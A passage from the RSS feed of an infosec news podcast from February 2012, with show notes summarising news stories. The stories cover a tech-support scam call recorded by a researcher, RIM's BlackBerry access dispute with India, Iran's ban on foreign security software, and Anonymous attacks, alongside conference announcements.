<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Indian reports also claim that the government has backed down on its demands to gain access to BlackBerry Enterprise Service (BES) messages. RIM rightly always maintained that it couldn&rsquo;t provide access to content running on its corporate service because it didn&rsquo;t hold the encryption keys &ndash; they reside with the sponsoring organization or business.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Intelligence Bureau director Nehchal Sandhu admitted to the paper that such corporate communications were not of &ldquo;high concern&rdquo; anyway from a security standpoint.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, RIM has reportedly reached an agreement with the government which effectively pushes responsibility for providing access to BES communications down to the service provider level.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.troyhunt.com/2012/02/scamming-scammers-catching-virus-call.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.troyhunt.com/2012/02/scamming-scammers-catching-virus-call.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[Karthik: I watched the first 30 minutes and last 20 minutes of the video, and in all honesty, its very embarrassing given that the guy on the other end is from my end of the world. He is everything you can define in a stupid defensive scammer, and gives even scammers a bad name, let alone all of the &ldquo;technical support&rdquo; people we have back home.&rdquo;]</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A few months back I got a call one evening which was clearly a virus call centre scam; you know, the ones that call you out of the blue, tell you your PC is infected with all sorts of nasties and offer to fix it for you? Or maybe you don&rsquo;t know, which of course is why these scams have been going on for quite some time and are still very active today.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Fortunately I did know about such things so rather than summarily dismissing them with a level of disdain I normally reserve only for telemarketers, I recorded the audio of the call right up until the point where they were ready to take control of my PC. I published the whole episode in my post titled Anatomy of a virus call centre scam.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But I was left wondering; what exactly were they going to do to my PC once they got remote control? Try and squeeze some cash out of me for &ldquo;fixing&rdquo; things? Install their own variant of &ldquo;antivirus&rdquo;? Or just plain old enslave my PC into being part of a botnet? So I decided to find out by letting them do whatever they wanted whilst recording the audio </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">and</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> the screen so the entire experience could be shared.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;&#8230;.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Let give you the abridged version here in case you (quite rightly) didn&rsquo;t feel like sitting through the entire thing:</span></p>
<ol>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The operator explains that the PC is infected with malicious files.</span></li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">He directed me to Ammyy which he then used to gain remote control of my PC.</span></li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">He started the Event Viewer then explained that errors and warnings are signs of serious problems with the PC.</span></li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">He then had me go the LogMeIn website and attempted to start a remote support connection </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">without</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> entering a PIN code. Naturally this failed after which he explained it&rsquo;s the &ldquo;software loyalty key&rdquo; for the computer and its expiration is the cause of all the &ldquo;problems&rdquo;.</span></li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Next, I was assured numerous times that there is absolutely no cost involved for him to &ldquo;fix&rdquo; the warranty.</span></li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I was then told the free warranty would cost a one-time payment of $160. Annually.</span></li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After explicitly prompting him, he confirmed this payment is for the software key for my Windows.</span></li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A PIN was given to me which I then entered into the LogMeIn website and granted them remote control to my machine. Again (on top of the Ammyy session).</span></li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The operator then controlled my PC and downloaded Advanced SystemCare 3, a legitimate (albeit twice superseded) product. He explicitly told it not to create a restore point when prompted.</span></li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SystemCare made numerous findings which the operator leveraged to explain the poor health of my PC, including an explanation that fragmented files indicated &ldquo;These are all of the hardware problems&rdquo;.</span></li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I was directed to a registration form where I registered with false information.</span></li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I was then forwarded to a payment gateway where credit card information was requested using a service provided by India&rsquo;s Bank of Baroda.</span></li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">At this stage I came clean and confronted the operator. Numerous excuses were made with the general gist of it being that they are honest, have not misled me and are providing a legitimate service.</span></li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When reviewing the system the next day whilst disconnected from the internet, the LogMeIn software loads automatically and attempts to re-establish a connection. It appears that there is now a persistent ability for Comantra to take remote control of the machine.</span></li>
</ol>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://thehackernews.com/2012/02/iran-will-develop-their-own-security.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://thehackernews.com/2012/02/iran-will-develop-their-own-security.html</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to latest report, Iran&#39;s Information and Communications Technology Minister announce that &#8211; Iran has prohibited import of foreign computer security software.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Because International sanctions stopped Iran from obtaining anti-virus software. So, Iran stressed that no foreign software for computer security will be imported into the country, adding that Iran will rely on its own software, made by local developers. The Bonian Daneshpajouhan Institute has about 25 smaller firms that develop domestic security software of various nature, and country will rely on it.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A senior Iranian intelligence official has claimed that an estimated 16,000 computers were infected by the Stuxnet virus, which targeted the country&#39;s nuclear facilities and other industrial sites in 2010. The ban is intended to push Iran into the production of its own malware defense instruments.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Whether the Stuxnet virus affected only computers within Iran, or whether the virus has infected computers outside the country as well. The virus, specifically designed to target Iran&#39;s nuclear facilities and other industrial sites, was created in 2010. Two more espionage viruses were recently uncovered by Iranian officials, </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Stars</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> virus embeds itself in the file systems of government institutions, and the </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Duqu </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">virus gathers information.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-600-ex-girlfriend-scam-attack-friday-rims-backdoor-sniffed-fing-indian-scammer-and-iran-homegrown-software/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3533/0/infosec-daily-podcast-episode-600.mp3" length="19925037" type="audio/mpeg" />
		<itunes:duration>0:41:28</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 600 for February 21, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, &#160;Adrian Crenshaw, Karthik Rangarajan, Themson Mester, Dr. Bonez, and Varun Sharma.
	&#160;
Announcements:
Social Engin[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 600 for February 21, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, &#160;Adrian Crenshaw, Karthik Rangarajan, Themson Mester, Dr. Bonez, and Varun Sharma.
	&#160;
Announcements:
Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open! &#160;If you have some Anti-Forensics talks, that would be awesome.
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012 
	Where: Courtyard Seattle Federal Way, WA http://www.sans.org/mentor/details.php?nid=28014
	Defcon 20
	When: July 26-29, 2012
	Where: Rio Hotel and Casino &#8211; Las Vegas, NV
	http://defcon.org/
	CFP &#38; Room reservations now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://net-security.org/secworld.php?id=12434
	Survey scammers love targeting Facebook users, because the social nature of the network makes sure that the scam will be propagated far and wide.
	The latest of these scams has been hitting the Walls of compromised accounts with posts containing a thumbnail suggesting a link to a sex video, accompanied with the following message: &#34;[Video] WOW.. watch what Happened to his Ex Girlfriend!! [LINK] Omg. I cant believe this actually happened to his Ex-Girlfreind!&#34;
	According to Sophos, friends of the user whose compromised account posted the message have also been named in it, assuring that at least some of them will surely check out the message.
	Those that follow the link are asked to install a &#34;Divx plugin&#34; in order to see the video &#8211; which, by the way, is not even the same video they wanted to see:
	&#8230;.
	Source: &#160;http://www.wired.com/threatlevel/2012/02/anonymous-friday-attacks/
	Anonymous, a group not known for discipline, is giving itself a weekly deadline, a new attack every Friday.
	Following the Tuesday compromise of the website of tear gas maker Combined Systems, Inc., the Antisec wing of Anonymous struck a Federal Trade Commission webserver which hosts three FTC websites, business.ftc.gov, consumer.gov and ncpw.gov, the National Consumer Protection Week partnership website.
	Claiming this hack in opposition of the controversial international copyright treaty known as ACTA, which had been widely protested around the world for its potential to curtail freedom of expression on the internet, Anonymous continued the political messaging that has marked much of its recent high-profile actions.
	Anons claiming responsibility for the attack spoke to Wired.com in an online chat just as it happened, freely admitting that there was nothing technically remarkable in this hack. As one remarked, &#8220;own &#38; rm and move on.&#8221; (rm being a unix command to delete data.)
	But this week&#8217;s at[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 599 &#8211; How I got Pwn’d, IPv6 DDoS, S4 Conference &amp; Password Maker</title>
		<link>http://www.isdpodcast.com/episode-599-how-i-got-pwnd-ipv6-ddos-s4-conference-password-maker</link>
		<comments>http://www.isdpodcast.com/episode-599-how-i-got-pwnd-ipv6-ddos-s4-conference-password-maker#comments</comments>
		<pubDate>Tue, 21 Feb 2012 02:00:26 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3529</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 599 for February 20, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Dr B0n3z, Beau Woods, Adrian Crenshaw, and Karthik Rangarajan. &#160; Announcements: Social Engineering Training When: March 5-9, 2012 Where: Seattle, Washington When: July 21-24, 2012 Where: Black Hat Vegas When: August 20-24, 2012 Where: &#160;Bristol, UK When: [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 599 for February 20, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Dr B0n3z, Beau Woods, Adrian Crenshaw, and Karthik Rangarajan.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open! &nbsp;If you have some Anti-Forensics talks, that would be awesome.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Defcon 20</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 26-29, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Rio Hotel and Casino &#8211; Las Vegas, NV</span><br />
	<a href="http://defcon.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://defcon.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP &amp; Room reservations now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
